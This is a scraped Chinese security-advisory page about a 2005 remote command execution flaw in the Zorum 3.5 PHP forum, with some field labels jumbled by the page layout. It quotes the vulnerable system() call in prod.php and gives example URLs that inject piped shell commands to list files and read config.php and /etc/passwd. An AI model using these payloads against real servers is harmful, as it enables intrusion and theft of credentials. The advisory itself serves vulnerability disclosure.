信息提供：安全公告（或线索）提供热线：51c_IT技术专题(Zorum 3.5远程代码执行漏洞)

开发技术指南» 文章正文

引言：信息提供：安全公告（或线索）提供热线：51c

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com 漏洞类别：设计漏洞攻击类型：本地攻击发布日期： 2005-11-11 更新日期： 2005-11-11 受影响系统： sudo 1.x 安全系统：无漏洞报告人： charles morris ......

·bzip2远程拒绝服务漏洞 »显示摘要«

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com 漏洞类别：拒绝服务漏洞攻击类型：远程攻击发布日期： 2005-05-17 更新日期： 2005-08-26 受影响系统： turbolinux turbolinux workstation 8.0 turbolinux turb......

Zorum 3.5远程代码执行漏洞

安全公告（或线索）提供热线:51cto.editor@gmail.com

漏洞类别: 【程序编程相关:C++实用技巧两则】

信息提供: 【推荐阅读:C++中的虚函数(1)】

远程攻击

发布日期: 【扩展信息:常见的三种中文内码转换代码】

远程代码执行漏洞

攻击类型:

2005-08-22

更新日期:

2005-08-22

受影响系统:

zorum zorum 3.5

安全系统:

无

漏洞报告人:

rgod （rgod@autistici.org）

漏洞描述:

zorum是一款用php实现的免费开源论坛程序.

zorum的/gorum/prod.php文件中存在远程代码执行漏洞:

07 $doubleapp = isset($argv[1]);

...

14 if( $doubleapp )

15 {

16 $appdir = $argv[1];

17 system("mkdir $proddir/$appdir");

...

用户可以使用管道字符执行任意命令:

http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-la

列出目录:

http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.php

或窃取数据库用户名/口令:

http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwd

测试方法:

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.
... 下一页

·ubuntu 为 cfengine升级 »显示摘要«

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com 漏洞类别：升级信息攻击类型：本地攻击发布日期： 2005-10-11 更新日期： 2005-10-11 受影响系统： ubuntu linux 4.10 ubuntu linux 5.04 安全系统：无 ......

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：